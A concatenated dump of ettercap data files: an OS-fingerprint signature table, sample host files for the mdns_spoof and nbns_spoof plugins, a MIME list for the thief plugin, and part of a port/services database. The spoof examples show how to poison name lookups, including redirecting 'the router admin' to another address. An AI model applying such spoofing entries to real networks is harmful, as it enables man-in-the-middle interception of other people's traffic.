FFFF:0586:40:01:0:1:1:1:S:3C:Mac OS X 10.2 FFFF:0586:40:WS:1:1:1:0:S:30:Windows 98 SE FFFF:058C:40:00:1:1:1:1:A:40:Windows XP Pro FFFF:058C:40:WS:0:0:0:0:A:2C:FreeBSD 4.5 FFFF:058C:40:WS:1:1:1:0:A:30:Windows 2000 Pro SP2 FFFF:058C:40:WS:1:1:1:0:S:30:Windows 98 FFFF:058C:80:00:1:1:1:1:A:40:FreeBSD FFFF:058C:80:WS:1:1:1:0:A:30:NetBSD FFFF:0598:40:WS:0:0:0:0:A:2C:FreeBSD 4.5 FFFF:0598:40:WS:0:0:0:0:S:2C:Cisco webcache FFFF:0598:80:00:1:1:1:1:A:40:Windows 2000 Server Service Pack 4 FFFF:05A0:80:WS:1:1:1:0:A:30:Windows XP FFFF:05A0:80:WS:1:1:1:0:S:30:Windows XP Pro FFFF:05A0:FF:WS:1:1:1:0:S:30:Windows 98 FFFF:05A4:40:WS:1:1:1:0:A:30:Windows 3.11 FFFF:05AB:80:WS:1:1:0:0:S:30:Windows FFFF:05AC:40:00:1:1:1:0:S:34:MS Windows XP SP1 FFFF:05AC:40:00:1:1:1:1:S:40:Windows XP FFFF:05AC:40:01:0:1:0:1:A:3C:FreeBSD 4.5-STABLE FFFF:05AC:40:01:0:1:1:1:S:3C:Mac OS X 10.2.x FFFF:05AC:40:WS:0:0:1:0:A:2C:FreeBSD 4.3 - 4.4 FFFF:05AC:40:WS:1:1:1:0:S:30:Windows 98 Second Edition FFFF:05AC:40:WS:1:1:1:0:S:LT:Windows 98 FFFF:05AC:80:00:0:1:0:1:S:3C:Windows XP FFFF:05AC:80:00:1:1:1:1:A:40:Windows 2000 Server FFFF:05AC:80:WS:0:0:1:0:S:LT:Windows 98 FFFF:05AC:80:WS:1:1:1:0:A:30:BSD FFFF:05AC:80:WS:1:1:1:0:S:30:Windows 95 FFFF:05B0:80:WS:1:1:1:0:S:30:Windows 2000 Professional FFFF:05B4:40:00:0:1:0:0:S:3C:CacheOS 3.1 on a CacheFlow 6000 FFFF:05B4:40:00:0:1:1:1:A:3C:Mac OS X (Panther) ver. 10.3.3 (7F44) FFFF:05B4:40:00:0:1:1:1:S:3C:FreeBSD 4.4 / 4.5 / 4.7 FFFF:05B4:40:00:1:1:1:1:S:40:Openbsd 2.9 FFFF:05B4:40:01:0:1:0:0:A:30:FreeBSD 4.5 FFFF:05B4:40:01:0:1:0:0:S:30:AOL proxy FFFF:05B4:40:01:0:1:0:1:A:3C:FreeBSD 4.4 - 4.5 FFFF:05B4:40:01:0:1:0:1:A:LT:AIX FFFF:05B4:40:01:0:1:1:1:A:3C:FreeBSD 4.3 - 4.4 - 5.1 FFFF:05B4:40:01:0:1:1:1:A:LT:Linux FFFF:05B4:40:01:0:1:1:1:S:3C:FreeBSD 4.5-STABLE FFFF:05B4:40:01:0:1:1:1:S:44:FreeBSD FFFF:05B4:40:01:1:1:1:1:A:40:FreeBSD 5.3 FFFF:05B4:40:01:1:1:1:1:S:40:FreeBSD 5.3RELEEASE FFFF:05B4:40:02:0:1:0:1:A:3C:AIX 4.3 FFFF:05B4:40:02:1:1:1:0:S:34:Windows 2003 FFFF:05B4:40:02:1:1:1:1:S:40:Windows XP FFFF:05B4:40:03:0:1:1:1:A:3C:FreeBSD 4.7-RELEASE FFFF:05B4:40:WS:0:0:0:0:A:2C:FreeBSD 4.5 FFFF:05B4:40:WS:0:0:0:0:A:LT:Win NT 4.0 SP4 FFFF:05B4:40:WS:0:0:1:0:A:2C:FreeBSD 4.3 - 4.4 FFFF:05B4:40:WS:0:0:1:0:S:2C:FreeBSD 4.5-RELEASE FFFF:05B4:40:WS:1:1:0:0:S:30:Windows 98 FFFF:05B4:40:WS:1:1:1:0:A:30:Windows 2000 Pro SP2 FFFF:05B4:40:WS:1:1:1:0:S:30:Windows 98 Second Edition FFFF:05B4:80:00:0:0:1:0:A:LT:MacOS 8.1 FFFF:05B4:80:00:0:1:0:0:A:LT:AIX 3.2 running on RS/6000 FFFF:05B4:80:00:0:1:0:1:A:LT:AIX 3.2 running on RS/6000 FFFF:05B4:80:00:0:1:1:1:A:3C:Windows 2000 SP4 FFFF:05B4:80:00:1:1:0:1:A:40:Windows 2000 Server FFFF:05B4:80:00:1:1:1:0:A:34:Windows 2000 Server SP4 FFFF:05B4:80:00:1:1:1:1:A:40:Windows 2000 Advanced Server FFFF:05B4:80:01:0:1:1:1:S:3C:FreeBSD 5.0 dp-1 FFFF:05B4:80:01:1:1:1:0:S:34:Windows XP SP2 FFFF:05B4:80:02:1:1:1:0:A:34:Windows XP Sp 2 FFFF:05B4:80:03:1:1:1:0:S:34:Windows 2000 FFFF:05B4:80:03:1:1:1:1:S:40:Windows 2000 SP 3 FFFF:05B4:80:WS:0:0:0:0:A:2C:Windows XP FFFF:05B4:80:WS:0:0:1:0:A:2C:BSD FFFF:05B4:80:WS:1:1:0:0:A:30:Windows 2000 Server SP4 FFFF:05B4:80:WS:1:1:0:0:S:30:Windows 98 SE FFFF:05B4:80:WS:1:1:1:0:A:30:NetBSD FFFF:05B4:80:WS:1:1:1:0:S:30:Windows 2000 Professional SP4 FFFF:05B4:80:WS:1:1:1:0:S:LT:MacOS X FFFF:05B4:FF:01:0:1:1:0:A:30:Mac OS 9 FFFF:05B4:FF:01:0:1:1:0:S:30:Mac OS 9 FFFF:05B4:FF:WS:0:0:1:0:A:2C:FreeBSD FFFF:05B4:FF:WS:1:1:1:0:S:30:Windows 2000 FFFF:7805:40:01:0:1:0:1:S:3C:Mac OS X 10.3 FFFF:7E05:80:00:1:1:1:1:S:40:Windows 2000 FFFF:8C05:FF:01:0:1:0:1:A:LT:MacOS X FFFF:A005:40:01:0:1:1:1:S:LT:Linux (Embedded) Router FFFF:AC05:80:00:1:1:1:1:S:40:Windows XP FFFF:AC05:80:WS:1:1:1:0:S:30:Windows XP FFFF:B405:40:00:0:1:1:1:A:3C:Mac OS X (Panther) ver. 10.3.x FFFF:B405:40:00:0:1:1:1:S:3C:Mac OS X 10.3 Panther FFFF:B405:40:00:0:1:1:1:S:LT:Darwin FFFF:B405:40:00:0:1:1:1:S:LT:Darwin 1.4 FFFF:B405:40:00:0:1:1:1:S:LT:Mac OS X FFFF:B405:40:00:0:1:1:1:S:LT:Mac OS X 10.3.2 (ppc) FFFF:B405:40:00:0:1:1:1:S:LT:Mac Os X 10.3.4 FFFF:B405:40:01:0:1:0:1:A:3C:FreeBSD 4.4 / 4.5 FFFF:B405:40:01:0:1:1:0:A:LT:Mac OS X FFFF:B405:40:01:0:1:1:1:A:3C:Mac OS X 10.1.3 / 10.2.x FFFF:B405:40:01:0:1:1:1:S:3C:Mac OS X 10.1.x FFFF:B405:40:02:0:1:1:1:S:3C:Mac OS X 10.x.x FFFF:B405:40:WS:0:0:1:0:A:2C:Mac OS X FFFF:B405:40:WS:0:0:1:0:A:LT:Mac OS X FFFF:B405:40:WS:0:0:1:0:S:2C:Mac OS X 10.3 FFFF:B405:40:WS:0:0:1:0:S:LT:Mac OS X (10.3) FFFF:B405:40:WS:0:0:1:0:S:LT:Mac OS X (10.3) FFFF:B405:40:WS:0:0:1:0:S:LT:Mac OS X 10.3 FFFF:B405:80:00:0:1:1:1:A:3C:Windows 2000 FFFF:B405:80:00:0:1:1:1:A:LT:Windows XP FFFF:B405:80:WS:0:0:0:0:A:2C:Windows 2000 Advanced Server FFFF:B405:80:WS:1:1:1:0:A:30:Windows XP FFFF:B405:80:WS:1:1:1:0:S:30:Windows FFFF:B405:FF:02:0:1:0:1:A:LT:AIX FFFF:B405:FF:02:0:1:1:0:S:LT:Mac OS 9.2 FFFF:_MSS:80:00:0:0:0:0:A:LT:IBM MVS TCP/IP stack V. 3.2 or AIX 4.3.2 FFFF:_MSS:80:00:0:1:1:0:A:LT:Cray Unicos 9.0 - 10.0 or Unicos/mk 1.5.1 FFFF:_MSS:80:00:0:1:1:1:A:LT:Cray Unicos 9.0 - 10.0 or Unicos/mk 1.5.1 FFFF:_MSS:80:WS:0:0:0:0:A:LT:IBM MVS TCP/IP stack V. 3.2 or AIX 4.3.2 FFFF:_MSS:80:WS:0:0:1:0:A:LT:Novell NetWare 3.12 - 5.00 FFFF:_MSS:FF:WS:0:0:1:0:A:LT:Solaris 2.6 - 2.7 ettercap-0.8.3.1/share/etter.mdns000664 000000 000000 00000005357 13711276346 016604 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.mdns -- host file for mdns_spoof plugin # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ # # # Sample hosts file for mdns_spoof plugin # # # # the format is (for A query): # # www.myhostname.com A 168.11.22.33 # # *.foo.com A 168.44.55.66 # # # # ... for a AAAA query (same hostname allowed): # # www.myhostname.com AAAA 2001:db8::1 # # *.foo.com AAAA 2001:db8::2 # # # # or for PTR query: # # www.bar.com PTR 10.0.0.10 # # www.google.com PTR ::1 # # # # or for SRV query (either IPv4 or IPv6): # # service._tcp|_udp.domain SRV 192.168.1.10:port # # service._tcp|_udp.domain SRV [2001:db8::3]:port # # # # NOTE: the wildcarded hosts can't be used to poison the PTR requests # # so if you want to reverse poison you have to specify a plain # # host. (look at the www.microsoft.com example) # # # ############################################################################ # vim:ts=8:noexpandtab ettercap-0.8.3.1/share/etter.mdns.examples000664 000000 000000 00000001403 13711276346 020405 0ustar00rootroot000000 000000 ################################ # microsoft sucks ;) # redirect it to www.linux.org # microsoft.com A 198.182.196.56 *.microsoft.com A 198.182.196.56 www.microsoft.com PTR 198.182.196.56 # Wildcards in PTR are not allowed ########################################## # normally .local is dedicated use for mDNS # try to redirect the router admin router.local A 192.168.0.25 router.local AAAA 2001:db8::25 # our router supports also IPv6 router.local PTR 192.168.0.25 router.local PTR 2001:db8::25 ############################################### # some service discovery examples xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269 domain._udp.local SRV [2001:db8:c001:beef::1]:53 # vim:ts=8:noexpandtab ettercap-0.8.3.1/share/etter.mime000664 000000 000000 00000004363 13711276346 016566 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.mime -- mime types for thief plugin # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ # # format: # # mime_typeextension # # MIME type Extension application/mac-binhex40 hqx application/msword doc application/octet-stream bin application/pdf pdf application/postscript ps application/rtf rtf application/x-cpio cpio application/x-gtar gtar application/x-gzip gz application/x-javascript js application/x-latex latex application/x-shockwave-flash swf application/x-tar tar application/zip zip audio/basic au audio/midi midi audio/mpeg mp3 audio/x-aiff aif audio/x-pn-realaudio ram audio/x-pn-realaudio-plugin rpm audio/x-realaudio ra audio/x-wav wav image/gif gif image/jpeg jpg image/png png image/tiff tiff image/x-xbitmap xbm image/x-xpixmap xpm text/css css text/plain txt text/xml xml video/mpeg mpeg video/quicktime mov video/x-msvideo avi ettercap-0.8.3.1/share/etter.nbns000664 000000 000000 00000003165 13711276346 016576 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.nbns -- host file for nbns_spoof plugin # # # # Copyright (C) Ettercap Team # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ # # # Sample hosts file for dns_spoof plugin # # # # NAME # # # # Example: # # CORP 192.168.0.10 # # # ############################################################################ #just for fun WORKGROUP 127.0.0.1 ettercap-0.8.3.1/share/etter.services000664 000000 000000 00000316460 13711276346 017466 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.services -- services database # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ # # # Total entries : 2183 # # # ############################################################################ # # Network services, Internet style # # Note that it is presently the policy of IANA to assign a single well-known # port number for both TCP and UDP; hence, most entries here have two entries # even if the protocol doesn't support UDP operations. # Updated from RFC 1700, ``Assigned Numbers'' (October 1994). Not all ports # are included, only the more common ones. # # The latest IANA port assignments can be gotten from # http://www.iana.org/assignments/port-numbers # The Well Known Ports are those from 0 through 1023. # The Registered Ports are those from 1024 through 49151 # The Dynamic and/or Private Ports are those from 49152 through 65535 # # Each line describes one service, and is of the form: # # service-name port/protocol [aliases ...] [# comment] # This list of services is from the # Nmap security scanner ( http://www.insecure.org/nmap/ ) # # For a HUGE list of services (including these and others), # see http://www.graffiti.com/services tcpmux 1/tcp # TCP Port Service Multiplexer [rfc-1078] tcpmux 1/udp # TCP Port Service Multiplexer compressnet 2/tcp # Management Utility compressnet 2/udp # Management Utility compressnet 3/tcp # Compression Process compressnet 3/udp # Compression Process rje 5/tcp # Remote Job Entry rje 5/udp # Remote Job Entry echo 7/tcp # echo 7/udp # discard 9/tcp # sink null discard 9/udp # sink null systat 11/tcp # Active Users systat 11/udp # Active Users daytime 13/tcp # daytime 13/udp # netstat 15/tcp # qotd 17/tcp # Quote of the Day qotd 17/udp # Quote of the Day msp 18/tcp # Message Send Protocol msp 18/udp # Message Send Protocol chargen 19/tcp # ttytst source Character Generator chargen 19/udp # ttytst source Character Generator ftp-data 20/tcp # File Transfer [Default Data] ftp-data 20/udp # File Transfer [Default Data] ftp 21/tcp # File Transfer [Control] ftp 21/udp # File Transfer [Control] ssh 22/tcp # Secure Shell Login ssh 22/udp # Secure Shell Login telnet 23/tcp # telnet 23/udp # priv-mail 24/tcp # any private mail system priv-mail 24/udp # any private mail system smtp 25/tcp # Simple Mail Transfer smtp 25/udp # Simple Mail Transfer nsw-fe 27/tcp # NSW User System FE nsw-fe 27/udp # NSW User System FE msg-icp 29/tcp # MSG ICP msg-icp 29/udp # MSG ICP msg-auth 31/tcp # MSG Authentication msg-auth 31/udp # MSG Authentication dsp 33/tcp # Display Support Protocol dsp 33/udp # Display Support Protocol priv-print 35/tcp # any private printer server priv-print 35/udp # any private printer server time 37/tcp # timserver time 37/udp # timserver rap 38/tcp # Route Access Protocol rap 38/udp # Route Access Protocol rlp 39/tcp # Resource Location Protocol rlp 39/udp # Resource Location Protocol graphics 41/tcp # graphics 41/udp # nameserver 42/tcp # Host Name Server nameserver 42/udp # Host Name Server whois 43/tcp # nicname shois 43/udp # nicname mpm-flags 44/tcp # MPM FLAGS Protocol mpm-flags 44/udp # MPM FLAGS Protocol mpm 45/tcp # Message Processing Module [recv] mpm 45/udp # Message Processing Module [recv] mpm-snd 46/tcp # MPM [default send] mpm-snd 46/udp # MPM [default send] ni-ftp 47/tcp # NI FTP ni-ftp 47/udp # NI FTP auditd 48/tcp # Digital Audit Daemon auditd 48/udp # Digital Audit Daemon tacacs 49/tcp # Login Host Protocol (TACACS) tacacs 49/udp # Login Host Protocol (TACACS) re-mail-ck 50/tcp # Remote Mail Checking Protocol re-mail-ck 50/udp # Remote Mail Checking Protocol la-maint 51/tcp # IMP Logical Address Maintenance la-maint 51/udp # IMP Logical Address Maintenance xns-time 52/tcp # XNS Time Protocol xns-time 52/udp # XNS Time Protocol domain 53/tcp # Domain Name Server domain 53/udp # Domain Name Server xns-ch 54/tcp # XNS Clearinghouse xns-ch 54/udp # XNS Clearinghouse isi-gl 55/tcp # ISI Graphics Language isi-gl 55/udp # ISI Graphics Language xns-auth 56/tcp # XNS Authentication xns-auth 56/udp # XNS Authentication priv-term 57/tcp # any private terminal access priv-term 57/udp # any private terminal access xns-mail 58/tcp # XNS Mail xns-mail 58/udp # XNS Mail priv-file 59/tcp # any private file service priv-file 59/udp # any private file service ni-mail 61/tcp # NI MAIL ni-mail 61/udp # NI MAIL acas 62/tcp # ACA Services acas 62/udp # ACA Services via-ftp 63/tcp # VIA Systems - FTP & whois++ via-ftp 63/udp # VIA Systems - FTP & whois++ covia 64/tcp # Communications Integrator (CI) covia 64/udp # Communications Integrator (CI) tacacs-ds 65/tcp # TACACS-Database Service tacacs-ds 65/udp # TACACS-Database Service sql*net 66/tcp # Oracle SQL*NET sql*net 66/udp # Oracle SQL*NET dhcpserver 67/tcp # DHCP/Bootstrap Protocol Server dhcpserver 67/udp # DHCP/Bootstrap Protocol Server dhcpclient 68/tcp # DHCP/Bootstrap Protocol Client dhcpclient 68/udp # DHCP/Bootstrap Protocol Client tftp 69/tcp # Trivial File Transfer tftp 69/udp # Trivial File Transfer gopher 70/tcp # gopher 70/udp # netrjs-1 71/tcp # Remote Job Service netrjs-1 71/udp # Remote Job Service netrjs-2 72/tcp # Remote Job Service netrjs-2 72/udp # Remote Job Service netrjs-3 73/tcp # Remote Job Service netrjs-3 73/udp # Remote Job Service netrjs-4 74/tcp # Remote Job Service netrjs-4 74/udp # Remote Job Service priv-dial 75/tcp # any private dial out service priv-dial 75/udp # any private dial out service deos 76/tcp # Distributed External Object Store deos 76/udp # Distributed External Object Store priv-rje 77/tcp # any private RJE service, netrjs priv-rje 77/udp # any private RJE service, netjrs vettcp 78/tcp # vettcp 78/udp # finger 79/tcp # finger 79/udp # http 80/tcp # World Wide Web HTTP http 80/udp # World Wide Web HTTP hosts2-ns 81/tcp # HOSTS2 Name Server hosts2-ns 81/udp # HOSTS2 Name Server xfer 82/tcp # XFER Utility xfer 82/udp # XFER Utility mit-ml-dev 83/tcp # MIT ML Device mit-ml-dev 83/udp # MIT ML Device ctf 84/tcp # Common Trace Facility ctf 84/udp # Common Trace Facility mit-ml-dev 85/tcp # MIT ML Device mit-ml-dev 85/udp # MIT ML Device mfcobol 86/tcp # Micro Focus Cobol mfcobol 86/udp # Micro Focus Cobol priv-term-l 87/tcp # any private terminal link, ttylink kerberos-sec 88/tcp # Kerberos (v5) kerberos-sec 88/udp # Kerberos (v5) su-mit-tg 89/tcp # SU/MIT Telnet Gateway su-mit-tg 89/udp # SU/MIT Telnet Gateway dnsix 90/tcp # DNSIX Securit Attribute Token Map dnsix 90/udp # DNSIX Securit Attribute Token Map mit-dov 91/tcp # MIT Dover Spooler mit-dov 91/udp # MIT Dover Spooler npp 92/tcp # Network Printing Protocol npp 92/udp # Network Printing Protocol dcp 93/tcp # Device Control Protocol dcp 93/udp # Device Control Protocol objcall 94/tcp # Tivoli Object Dispatcher objcall 94/udp # Tivoli Object Dispatcher supdup 95/tcp # BSD supdupd(8) supdup 95/udp # dixie 96/tcp # DIXIE Protocol Specification dixie 96/udp # DIXIE Protocol Specification swift-rvf 97/tcp # Swift Remote Virtural File Protocol swift-rvf 97/udp # Swift Remote Virtural File Protocol linuxconf 98/tcp # linuxconf tacnews 98/udp # TAC News metagram 99/tcp # Metagram Relay metagram 99/udp # Metagram Relay newacct 100/tcp # [unauthorized use] hostname 101/tcp # hostnames NIC Host Name Server hostname 101/udp # hostnames NIC Host Name Server iso-tsap 102/tcp # tsap ISO-TSAP Class 0 iso-tsap 102/udp # tsap ISO-TSAP Class 0 gppitnp 103/tcp # Genesis Point-to-Point Trans Net, or x400 ISO Email gppitnp 103/udp # Genesis Point-to-Point Trans Net acr-nema 104/tcp # ACR-NEMA Digital Imag. & Comm. 300 acr-nema 104/udp # ACR-NEMA Digital Imag. & Comm. 300 csnet-ns 105/tcp # Mailbox Name Nameserver csnet-ns 105/udp # Mailbox Name Nameserver pop3pw 106/tcp # Eudora compatible PW changer 3com-tsmux 106/udp # rtelnet 107/tcp # Remote Telnet rtelnet 107/udp # Remote Telnet Service snagas 108/tcp # SNA Gateway Access Server snagas 108/udp # SNA Gateway Access Server pop-2 109/tcp # PostOffice V.2 pop-2 109/udp # PostOffice V.2 pop-3 110/tcp # PostOffice V.3 pop-3 110/udp # PostOffice V.3 sunrpc 111/tcp # portmapper, rpcbind sunrpc 111/udp # portmapper, rpcbind mcidas 112/tcp # McIDAS Data Transmission Protocol mcidas 112/udp # McIDAS Data Transmission Protocol auth 113/tcp # ident, tap, Authentication Service auth 113/udp # ident, tap, Authentication Service audionews 114/tcp # Audio News Multicast audionews 114/udp # Audio News Multicast sftp 115/tcp # Simple File Transfer Protocol sftp 115/udp # Simple File Transfer Protocol ansanotify 116/tcp # ANSA REX Notify ansanotify 116/udp # ANSA REX Notify uucp-path 117/tcp # UUCP Path Service uucp-path 117/udp # UUCP Path Service sqlserv 118/tcp # SQL Services sqlserv 118/udp # SQL Services nntp 119/tcp # Network News Transfer Protocol nntp 119/udp # Network News Transfer Protocol cfdptkt 120/tcp # cfdptkt 120/udp # erpc 121/tcp # Encore Expedited Remote Pro.Call erpc 121/udp # Encore Expedited Remote Pro.Call smakynet 122/tcp # smakynet 122/udp # ntp 123/tcp # Network Time Protocol ntp 123/udp # Network Time Protocol ansatrader 124/tcp # ANSA REX Trader ansatrader 124/udp # ANSA REX Trader locus-map 125/tcp # Locus PC-Interface Net Map Ser locus-map 125/udp # Locus PC-Interface Net Map Ser unitary 126/tcp # Unisys Unitary Login unitary 126/udp # Unisys Unitary Login locus-con 127/tcp # Locus PC-Interface Conn Server locus-con 127/udp # Locus PC-Interface Conn Server gss-xlicen 128/tcp # GSS X License Verification gss-xlicen 128/udp # GSS X License Verification pwdgen 129/tcp # Password Generator Protocol pwdgen 129/udp # Password Generator Protocol cisco-fna 130/tcp # cisco FNATIVE cisco-fna 130/udp # cisco FNATIVE cisco-tna 131/tcp # cisco TNATIVE cisco-tna 131/udp # cisco TNATIVE cisco-sys 132/tcp # cisco SYSMAINT cisco-sys 132/udp # cisco SYSMAINT statsrv 133/tcp # Statistics Service statsrv 133/udp # Statistics Service ingres-net 134/tcp # INGRES-NET Service ingres-net 134/udp # INGRES-NET Service loc-srv 135/tcp # NCS local location broker loc-srv 135/udp # Location Service profile 136/tcp # PROFILE Naming System profile 136/udp # PROFILE Naming System netbios-ns 137/tcp # NETBIOS Name Service netbios-ns 137/udp # NETBIOS Name Service netbios-dgm 138/tcp # NETBIOS Datagram Service netbios-dgm 138/udp # NETBIOS Datagram Service netbios-ssn 139/tcp # NETBIOS Session Service netbios-ssn 139/udp # NETBIOS Session Service emfis-data 140/tcp # EMFIS Data Service emfis-data 140/udp # EMFIS Data Service emfis-cntl 141/tcp # EMFIS Control Service emfis-cntl 141/udp # EMFIS Control Service bl-idm 142/tcp # Britton-Lee IDM bl-idm 142/udp # Britton-Lee IDM imap2 143/tcp # Interim Mail Access Protocol v2 imap2 143/udp # Interim Mail Access Protocol v2 news 144/tcp # NewS window system news 144/udp # NewS window system uaac 145/tcp # UAAC Protocol uaac 145/udp # UAAC Protocol iso-tp0 146/tcp # iso-tp0 146/udp # iso-ip 147/tcp # iso-ip 147/udp # cronus 148/tcp # CRONUS-SUPPORT cronus 148/udp # CRONUS-SUPPORT aed-512 149/tcp # AED 512 Emulation Service aed-512 149/udp # AED 512 Emulation Service sql-net 150/tcp # sql-net 150/udp # hems 151/tcp # hems 151/udp # bftp 152/tcp # Background File Transfer Program bftp 152/udp # Background File Transfer Program sgmp 153/tcp # sgmp 153/udp # netsc-prod 154/tcp # netsc-prod 154/udp # netsc-dev 155/tcp # netsc-dev 155/udp # sqlsrv 156/tcp # SQL Service sqlsrv 156/udp # SQL Service knet-cmp 157/tcp # KNET/VM Command/Message Protocol knet-cmp 157/udp # KNET/VM Command/Message Protocol pcmail-srv 158/tcp # PCMail Server pcmail-srv 158/udp # PCMail Server nss-routing 159/tcp # nss-routing 159/udp # sgmp-traps 160/tcp # sgmp-traps 160/udp # snmp 161/tcp # snmp 161/udp # Simple Net Mgmt Proto snmptrap 162/tcp # snmp-trap snmptrap 162/udp # snmp-trap cmip-man 163/tcp # CMIP/TCP Manager cmip-man 163/udp # CMIP/TCP Manager cmip-agent 164/tcp # CMIP/TCP Agent smip-agent 164/udp # CMIP/TCP Agent xns-courier 165/tcp # Xerox xns-courier 165/udp # Xerox s-net 166/tcp # Sirius Systems s-net 166/udp # Sirius Systems namp 167/tcp # namp 167/udp # rsvd 168/tcp # rsvd 168/udp # send 169/tcp # send 169/udp # print-srv 170/tcp # Network PostScript print-srv 170/udp # Network PostScript multiplex 171/tcp # Network Innovations Multiplex multiplex 171/udp # Network Innovations Multiplex cl-1 172/tcp # Network Innovations CL/1 cl-1 172/udp # Network Innovations CL/1 xyplex-mux 173/tcp # xyplex-mux 173/udp # mailq 174/tcp # mailq 174/udp # vmnet 175/tcp # vmnet 175/udp # genrad-mux 176/tcp # genrad-mux 176/udp # xdmcp 177/tcp # X Display Mgr. Control Proto xdmcp 177/udp # X Display Manager Control Protocol nextstep 178/tcp # NextStep Window Server nextstep 178/udp # NextStep Window Server bgp 179/tcp # Border Gateway Protocol bgp 179/udp # Border Gateway Protocol ris 180/tcp # Intergraph ris 180/udp # Intergraph unify 181/tcp # unify 181/udp # audit 182/tcp # Unisys Audit SITP audit 182/udp # Unisys Audit SITP ocbinder 183/tcp # ocbinder 183/udp # ocserver 184/tcp # ocserver 184/udp # remote-kis 185/tcp # remote-kis 185/udp # kis 186/tcp # KIS Protocol kis 186/udp # KIS Protocol aci 187/tcp # Application Communication Interface aci 187/udp # Application Communication Interface mumps 188/tcp # Plus Five's MUMPS mumps 188/udp # Plus Five's MUMPS qft 189/tcp # Queued File Transport qft 189/udp # Queued File Transport gacp 190/tcp # Gateway Access Control Protocol cacp 190/udp # Gateway Access Control Protocol prospero 191/tcp # Prospero Directory Service prospero 191/udp # Prospero Directory Service osu-nms 192/tcp # OSU Network Monitoring System osu-nms 192/udp # OSU Network Monitoring System srmp 193/tcp # Spider Remote Monitoring Protocol srmp 193/udp # Spider Remote Monitoring Protocol irc 194/tcp # Internet Relay Chat irc 194/udp # Internet Relay Chat Protocol dn6-nlm-aud 195/tcp # DNSIX Network Level Module Audit dn6-nlm-aud 195/udp # DNSIX Network Level Module Audit dn6-smm-red 196/tcp # DNSIX Session Mgt Module Audit Redir dn6-smm-red 196/udp # DNSIX Session Mgt Module Audit Redir dls 197/tcp # Directory Location Service dls 197/udp # Directory Location Service dls-mon 198/tcp # Directory Location Service Monitor dls-mon 198/udp # Directory Location Service Monitor smux 199/tcp # SNMP Unix Multiplexer smux 199/udp # src 200/tcp # IBM System Resource Controller src 200/udp # IBM System Resource Controller at-rtmp 201/tcp # AppleTalk Routing Maintenance at-rtmp 201/udp # AppleTalk Routing Maintenance at-nbp 202/tcp # AppleTalk Name Binding at-nbp 202/udp # AppleTalk Name Binding at-3 203/tcp # AppleTalk Unused at-3 203/udp # AppleTalk Unused at-echo 204/tcp # AppleTalk Echo at-echo 204/udp # AppleTalk Echo at-5 205/tcp # AppleTalk Unused at-5 205/udp # AppleTalk Unused at-zis 206/tcp # AppleTalk Zone Information at-zis 206/udp # AppleTalk Zone Information at-7 207/tcp # AppleTalk Unused at-7 207/udp # AppleTalk Unused at-8 208/tcp # AppleTalk Unused at-8 208/udp # AppleTalk Unused tam 209/tcp # Trivial Authenticated Mail Protocol tam 209/udp # Trivial Authenticated Mail Protocol z39.50 210/tcp # wais, ANSI Z39.50 z39.50 210/udp # wais, ANSI Z39.50 914c-g 211/tcp # Texas Instruments 914C/G Terminal 914c-g 211/udp # Texas Instruments 914C/G Terminal anet 212/tcp # ATEXSSTR anet 212/udp # ATEXSSTR ipx 213/tcp # ipx 213/udp # vmpwscs 214/tcp # vmpwscs 214/udp # softpc 215/tcp # Insignia Solutions softpc 215/udp # Insignia Solutions atls 216/tcp # Access Technology License Server atls 216/udp # Access Technology License Server dbase 217/tcp # dBASE Unix dbase 217/udp # dBASE Unix mpp 218/tcp # Netix Message Posting Protocol mpp 218/udp # Netix Message Posting Protocol uarps 219/tcp # Unisys ARPs uarps 219/udp # Unisys ARPs imap3 220/tcp # Interactive Mail Access Protocol v3 imap3 220/udp # Interactive Mail Access Protocol v3 fln-spx 221/tcp # Berkeley rlogind with SPX auth fln-spx 221/udp # Berkeley rlogind with SPX auth rsh-spx 222/tcp # Berkeley rshd with SPX auth rsh-spx 222/udp # Berkeley rshd with SPX auth cdc 223/tcp # Certificate Distribution Center cdc 223/udp # Certificate Distribution Center direct 242/tcp # direct 242/udp # sur-meas 243/tcp # Survey Measurement sur-meas 243/udp # Survey Measurement dayna 244/tcp # dayna 244/udp # link 245/tcp # link 245/udp # dsp3270 246/tcp # Display Systems Protocol dsp3270 246/udp # Display Systems Protocol subntbcst_tftp 247/tcp # subntbcst_tftp 247/udp # bhfhs 248/tcp # bhfhs 248/udp # FW1-secureremote 256/tcp # also "rap" rap 256/udp # FW1-mc-fwmodule 257/tcp # FW1 management console for communication w/modules and also secure electronic transaction (set) port set 257/udp # secure electronic transaction Fw1-mc-gui 258/tcp # also yak winsock personal chat yak-chat 258/udp # yak winsock personal chat esro-gen 259/tcp # efficient short remote operations firewall1-rdp 259/udp # Firewall 1 proprietary RDP protocol http://www.inside-security.de/fw1_rdp_poc.html openport 260/tcp # openport 260/udp # nsiiops 261/tcp # iiop name service over tls/ssl nsiiops 261/udp # iiop name service over tls/ssl arcisdms 262/tcp # arcisdms 262/udp # hdap 263/tcp # hdap 263/udp # bgmp 264/tcp # FW1-or-bgmp 264/udp # FW1 secureremote alternate maybeFW1 265/tcp http-mgmt 280/tcp # http-mgmt 280/udp # personal-link 281/tcp # personal-link 281/udp # cableport-ax 282/tcp # cable port a/x cableport-ax 282/udp # cable port a/x novastorbakcup 308/tcp # novastor backup novastorbakcup 308/udp # novastor backup entrusttime 309/tcp # entrusttime 309/udp # bhmds 310/tcp # bhmds 310/udp # asip-webadmin 311/tcp # appleshare ip webadmin asip-webadmin 311/udp # appleshare ip webadmin vslmp 312/tcp # vslmp 312/udp # magenta-logic 313/tcp # magenta-logic 313/udp # opalis-robot 314/tcp # 